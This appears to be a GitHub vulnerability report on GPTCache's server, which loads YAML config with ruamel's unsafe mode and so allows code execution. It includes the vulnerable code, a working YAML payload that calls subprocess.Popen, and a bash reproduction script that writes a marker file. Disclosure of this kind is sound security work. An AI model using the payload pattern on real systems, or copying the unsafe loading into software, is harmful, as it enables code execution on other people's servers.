[vulnerability]: Remote Code Execution (RCE) via Unsafe YAML Deserialization in GPTCache Server #676

@YLChen-007

Current Behavior

Description:

Summary

A critical Remote Code Execution (RCE) vulnerability exists in the GPTCache server. The application uses the ruamel.yaml library with typ="unsafe" to parse configuration files. This unsafe deserialization setting allows an attacker to instantiate arbitrary Python objects and execute commands by supplying a malicious YAML configuration file. This vulnerability is triggered when the server is started with the -f or --cache-config-file argument pointing to a crafted YAML file.

Details

The vulnerability is located in the init_similar_cache_from_config function within gptcache/adapter/api.py. When the server initializes, it attempts to load a configuration file if one is provided. The code explicitly initializes the YAML parser with typ="unsafe", which disables standard security protections and allows the construction of arbitrary Python objects during parsing.

Vulnerable Code Snippet:

# gptcache/adapter/api.py

def init_similar_cache_from_config(config_dir: str, cache_obj: Optional[Cache] = None):
    import_ruamel()
    from ruamel.yaml import YAML  # pylint: disable=C0415

    if config_dir:
        with open(config_dir, "r", encoding="utf-8") as f:
            yaml = YAML(typ="unsafe", pure=True)  # <--- VULNERABLE: Unsafe deserialization enabled
            init_conf = yaml.load(f)              # <--- Payload executes here

Because typ="unsafe" is used, the yaml.load(f) call honours Python-specific tags such as !!python/object/apply and calls the referenced callable with the supplied arguments while the document is being constructed, so the payload runs during parsing, before the server validates or uses any configuration value.

Expected Behavior

No response

Steps To Reproduce

Prerequisites

  • GPTCache installed (pip install gptcache)
  • ruamel.yaml installed (dependency of GPTCache)
  • openai<1.0.0 (required for GPTCache server to run without error, though RCE triggers regardless)

Steps

  1. Create Malicious Config (poc_exploit.yaml):

    !!python/object/apply:subprocess.Popen
    - !!python/tuple
      - /bin/bash
      - -c
      - 'echo "pwned" > /tmp/pwned_gptcache.txt'
  2. Run Exploit:

    # Run the server with the malicious config
    # The exploit triggers immediately upon loading the config
    python3 -m gptcache_server.server -f poc_exploit.yaml
  3. Verify Impact:

    cat /tmp/pwned_gptcache.txt
    # Output: pwned

Automated Reproduction Script

#!/bin/bash
# Ensure gptcache is in python path
export PYTHONPATH=$PYTHONPATH:$(pwd)

# Clean up
rm -f /tmp/pwned_gptcache.txt

# Create payload
cat > poc_exploit.yaml <<EOF
!!python/object/apply:subprocess.Popen
- !!python/tuple
  - /bin/bash
  - -c
  - 'echo "pwned" > /tmp/pwned_gptcache.txt'
EOF

echo "[*] Starting GPTCache server with malicious config..."
# Run with timeout as the server might crash or hang after exploit
timeout 10s python3 -m gptcache_server.server -f poc_exploit.yaml

if [ -f /tmp/pwned_gptcache.txt ]; then
    echo "[+] RCE Successful! File /tmp/pwned_gptcache.txt created."
    cat /tmp/pwned_gptcache.txt
else
    echo "[-] RCE Failed."
fi

Environment

Anything else?

No response
